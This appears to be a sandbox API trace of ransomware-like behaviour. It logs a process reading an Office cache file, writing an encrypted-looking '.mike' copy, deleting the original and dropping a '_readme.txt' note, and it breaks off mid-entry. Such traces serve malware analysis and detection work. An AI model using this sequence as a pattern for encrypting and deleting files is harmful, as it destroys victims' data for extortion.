SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0040.271] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.271] GetFileType (hFile=0x264) returned 0x1 [0040.271] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0040.271] GetFileType (hFile=0x264) returned 0x1 [0040.271] CloseHandle (hObject=0x264) returned 1 [0040.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.271] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.272] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0040.272] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0040.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0040.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.272] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x229eb78 | out: lpFileInformation=0x229eb78*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1)) returned 1 [0040.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.272] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.272] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x229eeb4 | out: lpFileInformation=0x229eeb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1)) returned 1 [0040.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.272] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.272] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0040.272] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0040.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0040.273] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0040.273] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0040.273] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.273] GetFileType (hFile=0x264) returned 0x1 [0040.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0040.273] GetFileType (hFile=0x264) returned 0x1 [0040.273] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0040.274] WriteFile (in: hFile=0x264, lpBuffer=0x229fe24*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x229fe24*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0040.274] CloseHandle (hObject=0x264) returned 1 [0040.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.275] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x229f8f4 | out: lpFileInformation=0x229f8f4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1)) returned 1 [0040.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.275] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0040.275] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.275] GetFileType (hFile=0x264) returned 0x1 [0040.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0040.275] GetFileType (hFile=0x264) returned 0x1 [0040.275] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0040.275] ReadFile (in: hFile=0x264, lpBuffer=0x22a0f5c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22a0f5c*, lpNumberOfBytesRead=0x2af0c8*=0x5b1, lpOverlapped=0x0) returned 1 [0040.277] CloseHandle (hObject=0x264) returned 1 [0040.277] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0040.277] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.277] GetFileType (hFile=0x264) returned 0x1 [0040.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0040.277] GetFileType (hFile=0x264) returned 0x1 [0040.277] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0040.277] WriteFile (in: hFile=0x264, lpBuffer=0x22a6080*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22a6080*, lpNumberOfBytesWritten=0x2af0bc*=0x5c0, lpOverlapped=0x0) returned 1 [0040.278] CloseHandle (hObject=0x264) returned 1 [0040.279] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0040.279] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.279] GetFileType (hFile=0x264) returned 0x1 [0040.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0040.279] GetFileType (hFile=0x264) returned 0x1 [0040.280] WriteFile (in: hFile=0x264, lpBuffer=0x22a92bc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22a92bc*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0040.280] CloseHandle (hObject=0x264) returned 1 [0040.280] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.281] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0040.281] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2355ce0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2355ce0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2355ce0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e0)) returned 1 [0040.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0040.281] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.281] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike", lpFilePart=0x0) returned 0x56 [0040.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.281] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22aaad4 | out: lpFileInformation=0x22aaad4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2355ce0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2355ce0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2355ce0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e0)) returned 1 [0040.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.281] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.281] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", dwFileAttributes=0x80) returned 1 [0040.281] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.281] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 1 [0040.282] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0040.282] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0040.283] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpFilePart=0x0) returned 0x51 [0040.283] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\_readme.txt", lpFilePart=0x0) returned 0x53 [0040.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0040.283] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.283] GetFileType (hFile=0x264) returned 0x1 [0040.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0040.283] GetFileType (hFile=0x264) returned 0x1 [0040.283] WriteFile (in: hFile=0x264, lpBuffer=0x22ac84c*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x22ac84c*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0040.284] CloseHandle (hObject=0x264) returned 1 [0040.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0040.284] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpFilePart=0x0) returned 0x47 [0040.284] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpFilePart=0x0) returned 0x48 [0040.284] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe237be40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe237be40, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe237be40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe237be40, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0040.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0040.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2355ce0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2355ce0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2355ce0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.xml.mike", cAlternateFileName="PROOFX~1.MIK")) returned 1 [0040.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe237be40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe237be40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe237be40, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.285] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe237be40, ftCreationTime.dwHighDateTime=0x1d57a86, 